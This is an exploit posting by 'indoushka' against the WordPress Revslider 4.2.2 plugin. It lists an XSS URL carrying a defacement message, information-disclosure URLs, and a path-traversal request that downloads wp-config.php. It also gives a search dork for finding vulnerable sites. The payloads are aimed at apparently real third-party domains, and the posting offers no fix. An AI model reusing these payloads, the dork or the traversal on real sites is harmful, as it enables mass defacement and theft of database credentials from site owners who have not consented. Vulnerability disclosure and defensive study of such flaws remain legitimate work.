WordPress Revslider plugin version 4.2.2 suffer from cross site scripting, file download, and information disclosure vulnerabilities. Note that this finding houses site-specific data.
8ad1c24b948d5a65dab914200443c87ffe00a1d155d37bbd652a95364274a234
| # Title : WordPress Revslider 4.2.2 Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : https://revolution.themepunch.com/
=======================================
XSS :
https://www.codekom.com//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka..Give%20me%20your%20wp-config.php
information Disclosure :
https://www.codekom.com/wp-content/plugins/revslider/revslider_admin.php
https://www.codekom.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
Arbitrary File Download Exploit :
https://bh-3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Greetz :
jericho https://attrition.org & https://www.osvdb.org/ * packetstormsecurity.com * https://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------